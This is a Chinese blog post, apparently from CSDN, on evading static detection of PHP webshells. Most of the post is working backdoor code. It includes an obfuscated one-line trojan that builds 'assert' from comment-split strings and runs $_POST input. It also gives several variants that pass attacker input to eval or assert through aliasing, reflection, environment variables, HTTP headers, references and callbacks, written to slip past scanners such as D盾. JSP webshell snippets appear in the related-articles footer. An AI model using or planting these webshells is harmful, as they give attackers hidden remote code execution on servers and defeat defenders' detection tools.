webshell静态检测的绕过

最新推荐文章于 2024-05-03 14:07:04 发布
最新推荐文章于 2024-05-03 14:07:04 发布
阅读量3.4k 收藏 1
点赞数
分类专栏: web学习 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61142406/article/details/123693783
版权

一句话木马原理:
在这里插入图片描述基于_POST,[]等的检测

base64编码:
$b = base64_encode(_POST);
echo $b;
echo<br/>;
echo base64_decode($b);

gzcompress压缩:
$c = gzcompress('_POST');
echo $c;
echo '<br/>';
echo gzuncompress($c);

注释:
@${$__}[!$_](${$__}[$_]);@$_="s"."s"./*-/*-*/"e"./*-/*-*/"r";@$_=/*-/*-*/"a"./*-/*-*/$_./*-/*-*/"t";@$_/*-/*-*/($/*-/*-*/{"_P"./*-/*-*/"OS"./*-/*-*/"T"}[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]);

[]可用{}替换

异或,或,取反,大同小异就演示异或吧

在这里插入图片描述下面这是运算原理的代码,比较鸡肋,可以去看看yu师傅的文章
https://blog.csdn.net/miuzzx/article/details/109143413

<?php
$z = 'A';
for($m=1;$m<127;$m++){
    for($n=1;$n<127;$n++){
        $a = chr($m);
        $b = chr($n);
        $c = ($a^$b);
        if ($c === $z){
            if(preg_match('/[A-Za-z0-9]/',$a)) {
                continue;
            }elseif(preg_match('/[A-Za-z0-9]/',$b)){
                continue;
            }else{
            echo '("'.urlencode($a).'"^"'.urlencode($b).'")';
            echo '<br/>';
            }
    }
}
}
?>

自增

数组经过强行转化为字符串变为Array
取第一个字母A,然后运算,’A’++后会变成’B’,就可以获得所有字母然后通过字符串拼接的方式实现想要的代码
在这里插入图片描述

eval小坑

在PHP手册中提到eval:
因为是一个语言构造器而不是一个函数,不能被可变函数调用。
所以将eval赋给变量a的方式然后再 a ( ) ; 会 报 错 可 变 函 数 : 对 于 a();会报错 可变函数:对于 a();:a();形式PHP会查找与字符串a同名的函数并使用
在这里插入图片描述

assert

在PHP手册中对assert是这样说的:
assert() is a language construct in PHP 7
但是它却可以“作为”可变函数使用,但是会报错
在这里插入图片描述如果代码是
$a = ‘assert’;
a ( a( a(_POST[‘a’]);//a=system(‘whoami’);
这样就会报错,(除7.0版本),于是我翻了翻PHP手册是这样说的
In PHP 7, this may also be any expression that returns a value, which will be executed and the result used to indicate whether the assertion succeeded or failed.
大概意思就是任何返回值的表达式,该值将被执行
但是传参过去的是字符串就不能执行

webshell绕过

某些函数:

mb_ereg_replace 、 mb_eregi_replace
例如:
mb_eregi_replace(’.*’,$_GET[1],’’,‘e’);
ps:注意PHP版本

函数重命名

use function assert as test;

test($_POST[‘a’]);

反射ReflectionFunction类

ReflectionFunction类,看看PHP手册invokeArgs的方法解释
The passed arguments to the function as an array, much like call_user_func_array() works.
就是说m是函数,c是传入的参数,然后执行这个函数

在这里插入图片描述

文件名,类名,方法名

大同小异,就演示一个吧
截取文件名,最好是从最后开始吧,因为上传了你不知道路径,,,
限于上传文件系统未重命名的情况
在这里插入图片描述

基于污染传播

putenv($_GET[“c”]);eval(getenv(‘path’));
等等
putenv — 设置环境变量的值
getenv — 获得环境变量的值
在这里插入图片描述

引用传值

function aaa(&$var){
    $var = $_POST['a'];

}
$a = "";
aaa($a);
eval($a);

在这里插入图片描述

HTTP头

$a = $_GET[‘a’];
var_dump(getallheaders());
eval(getenv(‘HTTP_E’));
在这里插入图片描述

回调函数

回调函数祖师爷call_user_func();就不说了,D盾能测出来,就说说其他的

$a = $_REQUEST['a'];
register_shutdown_function($a,$_REQUEST['aaa']);
I·CE
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
jsp利用base64解码上传二进制文件
weixin_33829657的博客
05-19 800
当我们在有新建文本文件权限,但被限制上传、不能远程下载文件时,可以试试此方式shell:<%@ page import="java.util.*,java.io.*" pageEncoding="UTF-8" contentType="text/html; charset=utf-8"%> <% request.setCharacterE...
jsp一句话
云守护的专栏
03-25 9791
<% try { response.setHeader("content-type","text/html;charset=UTF-8"); String cmd = request.getParameter("k8"); String path = application.getRealPath(request.getRequestURI()); String dir = ne
2024年网安最全WebShell脚本检测机器学习二_机器学习检测webshell脚本实践
最新发布
2401_84252743的博客
05-03 773
上面提到了几种webshell静态检测的方法,无论是特征码匹配、语义检测还是特征统计方法,都需要建立在安全从业人员webshell原理深入的理解基础之上进行提炼,这是个非常耗时的过程,同时维护起来也是异常繁琐。苏宁在传统检测方法的基础之上,利用机器学习对webshell脚本检测进行赋能(详细使用方式可以参考webshellDc_v0.1。我们把webshell检测转换成一个NLP领域的文本分类的问题,通过投喂训练数据的方式锻炼模型对正常脚本及webshell脚本代码组合的记忆能力,以达到识别的效果。
jsp一句话小马
weixin_42786460的博客
09-09 878
jsp一句话小马
webshell的过滤绕过
middlecorn的博客
08-20 528
将把 a 变成 '['('Z' 的 ASCII 值是 90,'[' 的 ASCII 值是 91)。在PHP中,两个变量进行异或时,先会将字符串转换成ASCII值,再将ASCII值转换成二进制再进行异或,异或完,又将结果从二进制转换成了ASCII值,再将ASCII值转换成字符串。也就是说,'a'++ => 'b','b'++ => 'c'... 所以,我们只要能拿到一个变量,其值为a,通过自增操作即可获得a-z中所有字符。异或的二进制的值是00100001,对应的ASCII值是33,对应的字符串的值就是"!
小识.htaccess文件
aijie6150的博客
10-18 309
.htaccess文件(或者"分布式配置文件")提供了针对目录改变配置的方法, 即,在一个特定的文档目录中放置一个包含一个或多个指令的文件, 以作用于此目录及其所有子目录。作为用户,所能使用的命令受到限制。管理员可以通过Apache的AllowOverride指令来设置。 概述来说,htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过ht...
PHP常见过waf webshell以及最简单的检测方法
01-20
在那篇文章中我突然想到一种检测webshell的方法,就是首先获取到当前文件中的所有变量(不明白的可以先去看下之前的文章),然后再根据正则库进行静态检测。 自认为这种方法虽然会检测不完全(每个检测机制都不能...
webshell 攻与防kill_webshell_detect-master.zip
07-25
虽然做webshell弓|擎绕过时间不长,但是总结出.了一套自己的方法论,本篇内容会给出我的思考方式,包括针对webshell文件 多种检测手段的攻防总结,而不会直接给- -个通用的webshell,因为没有意义,授人以渔更加重要...
源码免杀webshell
05-04
【源码免杀Webshell】是一种特殊的Web应用程序代码,它被设计...总结来说,源码免杀Webshell是一种高度隐蔽的攻击工具,其设计目的是绕过现有的安全检测机制。理解其工作原理对于提高网络安全意识和防御能力至关重要。
纵深防御之WebShell攻防.pdf
09-11
而动态模拟执行虽然能够对抗静态混淆,但也面临污点传播被打断和程序执行流改变等绕过手段的挑战。 为了克服这些挑战,文章提出了“缺陷组合策略”,即结合静态语义分析和动态模拟执行的优点。静态分析保证动态污点...
小七专用免杀webshell
04-25
【小七专用免杀Webshell】是一种特殊设计的Webshell,专为小七(可能是某个开发者或团队的别称)定制,旨在绕过安全检测,提供对目标服务器的隐蔽访问。Webshell通常是由攻击者在成功入侵网站后上传的,用以远程控制...
webshell -真实可用的jsp
03-30
网上很多一句话webshell 各种原因导致不能用,亲测可用的大马,忍痛割爱与大家分享
1-2webshell提权 绕过防火墙到3389
01-22
1-2webshell提权 绕过防火墙到33891-2webshell提权 绕过防火墙到33891-2webshell提权 绕过防火墙到3389
WEB渗透学习笔记7——webshell及上传绕过
林林木林林L的博客
08-01 3230
webshell 概念 web指的是在web服务器上,而shell是用脚本语言编写的脚本程序,WebShell是一种用来进行网站和服务器管理的脚本程序,webshell一般是被网站管理员用于网站管理、服务器管理等等一些用途,但是由于webshell的功能比较强大,可以上传下载文件,查看数据库,甚至可以调用一些服务器上系统的相关命令(比如创建用户,修改删除文件之类的),通常被黑客利用,黑客通过一些上传方式,将自己编写的webshell上传到web服务器的页面的目录下,攻击者通过上传WebShell获得Web
Webshell检测绕过
m0_57798134的博客
08-17 544
webshell 概念。
php mb ereg,mb_ereg(i)_replace()代码注射漏洞及其延伸出的正则应用安全问题
weixin_39949473的博客
03-10 474
author: ryat#wolvez.orgteam:http://www.80vul.comdate:2009-04-30一 描叙mb_ereg_replace()是支持多字节的正则表达式替换函数,函数原型如下:string mb_ereg_replace ( string $pattern , string $replacement , string $string [, strin...
PHP的回调后门
feng的博客
10-17 926
前言 今天洪学长给我留个了任务,具体的就是关于回调后门这块的内容。我关于回调后门了解的很少很少,以前做南邮的题目遇到过一道三参数回调后门的题目,当时草草了解了一下,理解的不算很深。因此今天去学习了一下回调后门的相关内容。 PHP的回调函数 什么是回调函数? 所谓的回调函数,就是指调用函数时并不是向函数中传递一个标准的变量作为参数,而是将另一个函数作为参数传递到调用的函数中,这个作为参数的函数就是回调函数。通俗的来说,回调函数也是一个我们定义的函数,但是不是我们直接来调用的,而是通过另一个函数来调用的,这个函
JSP Webshell 免杀
悦分享
08-01 1621
上面提到JSP在第一次运行的时候会先被Web容器,如Tomcat翻译成Java文件,然后才会被Jdk编译成为Class加载到jvm虚拟机中运行。JDK在编译的时候只看java文件的格式是否正确。而Tomcat在翻译JSP的不会检查其是否合乎语法。...
河马php一句话木马,一句话木马的套路
weixin_42127020的博客
03-10 357
0x01 前言尽最大努力在一文中让大家掌握一些有用的 WEBSHELL 免杀技巧。0x02 关于 eval 于 assert关于 eval 函数在 php 给出的官方说明是eval 是一个语言构造器而不是一个函数,不能被 可变函数 调用可变函数:通过一个变量,获取其对应的变量值,然后通过给该值增加一个括号 (),让系统认为该值是一个函数,从而当做函数来执行通俗的说比如你这样是不行的 也造就了用...
php马-bypass _ alin'Blog1
08-03
绕过Webshell检测的关键在于创新和理解检测机制。攻击者可能采用的方法包括但不限于使用混淆技术、编码转换、利用未公开的系统函数、创建自定义的加密解密算法,以及利用未知的系统漏洞。同时,他们还需要考虑如何在...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值